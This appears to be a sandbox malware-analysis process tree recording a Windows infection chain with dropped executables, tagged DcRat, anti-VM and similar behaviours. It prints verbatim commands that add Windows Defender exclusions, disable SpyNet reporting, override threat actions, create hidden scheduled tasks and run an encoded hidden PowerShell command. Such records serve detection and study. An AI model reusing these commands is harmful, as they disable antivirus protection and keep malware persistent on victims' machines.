C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250506371\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250506371\assistant\assistant_installer.exe" --version5⤵
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250506371\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250506371\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x1280040,0x128004c,0x12800586⤵
-
-
-
-
C:\Users\Admin\Pictures\BcYeaLeGFO1Kc5t75Z6NYDXE.exe"C:\Users\Admin\Pictures\BcYeaLeGFO1Kc5t75Z6NYDXE.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS277F.tmp\Install.exe.\Install.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS2FDB.tmp\Install.exe.\Install.exe /fzMdidjCA "385118" /S6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "guazlFJvw" /SC once /ST 00:08:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- DcRat
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "guazlFJvw"7⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "guazlFJvw"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 05:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\JZzVLyM.exe\" id /wzsite_idtmd 385118 /S" /V1 /F7⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000087001\amadka.exe"C:\Users\Admin\AppData\Local\Temp\1000087001\amadka.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A85.bat" "1⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 12⤵
-
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exeC:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5972.exeC:\Users\Admin\AppData\Local\Temp\5972.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\5972.exeC:\Users\Admin\AppData\Local\Temp\5972.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\2ba928f0-5492-4124-ac73-055849ef4c5e" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\5972.exe"C:\Users\Admin\AppData\Local\Temp\5972.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\5972.exe"C:\Users\Admin\AppData\Local\Temp\5972.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\975b09a6-e62d-4d4f-b045-6ed169a90453\build2.exe"C:\Users\Admin\AppData\Local\975b09a6-e62d-4d4f-b045-6ed169a90453\build2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\975b09a6-e62d-4d4f-b045-6ed169a90453\build2.exe"C:\Users\Admin\AppData\Local\975b09a6-e62d-4d4f-b045-6ed169a90453\build2.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 18807⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\975b09a6-e62d-4d4f-b045-6ed169a90453\build3.exe"C:\Users\Admin\AppData\Local\975b09a6-e62d-4d4f-b045-6ed169a90453\build3.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\975b09a6-e62d-4d4f-b045-6ed169a90453\build3.exe"C:\Users\Admin\AppData\Local\975b09a6-e62d-4d4f-b045-6ed169a90453\build3.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- DcRat
- Creates scheduled task(s)
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8F48.exeC:\Users\Admin\AppData\Local\Temp\8F48.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- Modifies system certificate store
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exeC:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exe1⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\7AA3.exeC:\Users\Admin\AppData\Local\Temp\7AA3.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6068 -s 5722⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6068 -s 5722⤵
- Program crash
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\905E.bat" "1⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 12⤵
-
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\D076.exeC:\Users\Admin\AppData\Local\Temp\D076.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5300 -s 11123⤵
- Program crash
-
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx -s AppXSvc1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\JZzVLyM.exeC:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\JZzVLyM.exe id /wzsite_idtmd 385118 /S1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:643⤵
-
-
